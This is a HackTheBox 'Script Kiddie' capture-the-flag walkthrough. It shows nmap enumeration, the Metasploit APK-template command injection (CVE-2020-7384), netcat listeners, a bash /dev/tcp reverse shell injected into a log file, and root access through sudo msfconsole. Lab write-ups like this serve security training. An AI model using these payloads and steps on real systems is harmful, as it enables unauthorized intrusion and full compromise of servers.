HackTheBox : Script Kiddie Walkthrough

Concepts Learnt :

  1. Enumeration
  2. Malicious payload (apk template)
  3. Reverse Shell using bash
  4. Privilege escalation

Steps to Enumerate :

Run an Nmap Scan to find all the open ports!

Command : nmap -A IP of the Server

-A This options makes Nmap make an effort in identifying the target OS,services and the versions. It also does traceroute and applies NSE scripts to detect additional information.

-vv Defines level 2 verbosity for the scan

We see that there are 2 ports open :

22/tcp- SSH port

5000/tcp- HTTP port

Lets Explore the website on port 5000

Go to in the browser

A simple webpage with 3 Sections Nmap, MsfVenom and Searchsploit.

Looking at the webpage we could possibly start with Command Injection or File Upload Exploit.

Exploring the ExploitDB database, there is an apk template command injection : CVE-2020-7384

Steps to Exploit :

Run msfconsole to start Metasploit

Command : msfconsole

Search for apk template to find the exploit options!

Command : search apk_template

Hack The Box- Script Kiddie Exploit : Search for apk_template

We get the module apk_template_cmd_injection

Now use this file and see all the exploit options :

Command : use 0

Command : show options

Set LHOST to your tun0(IP of the device)

Command : set LHOST

Now set the LPORT to any number (I will use 4444)

Command : set LPORT 4444

And Now Run the command

Command : run

We can see that an apk file is generated and stored in .msf4/local/ folder

We will upload this to gain a reverse shell access to the server.

Lets move it to the Desktop for ease of use

Command : mv /home/kali/.msf4/local/msf.apk ~/Desktop

Now the file is available on the Desktop!

To exploit we will use the payload section on the website :

Run a netcat listener for the port 4444

Command : nc -nlvp 4444

On the website set the OS as android from the drop down

Insert any valid IP in the lhost box : (I will use

And upload the msf.apk using the browse option

Upon hitting generate, We get a shell on Netcat.

Check the list of files using the List command

Command : ls

The command line is not the default as we use for Linux. Lets make it the default command line layout.

Command : python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

Now we got a default layout!

Now check the kid folder we have users.txt :

Command : cd

Command : ls

Command : cat user.txt

That’s the first flag!

Exploring the file system, we find the following observations:

  1. There are 2 users Kid and Pwn

2. Scanlosers.sh file runs nmap against a file name hackers

3. The hackers file is present under kid/logs folder

We can use this hackers file to log in as pwn :

We can use a bash tcp reverse shell payload to gain access

Run a separate netcat listener to catch any reverse shells

We can use any port again to do so ( I will use 1337) :

Command : nc -nlvp 1337

Now run the following bash script (on the attack box):

Command : echo "  ;/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1' #" >> hackers

When you run this command ensure you are in the logs folder!

And we get access to the pwn user!

Checking for all permissions!

Command : sudo -l

We see that we can run msfconsole without root password!

Now run msfconsole as root(on the attack box)!

Command : sudo msfconsole

now using /bin/bash to get access to get a shell!

Command : /bin/bash

Again use the python script to get the standard linux shell :

We can see that we are logged in as root!

Now time to check the root folder:

And we have the second flag in the root.txt!

Command : cat root.txt

This was a fun room to work on. Hope you enjoyed!


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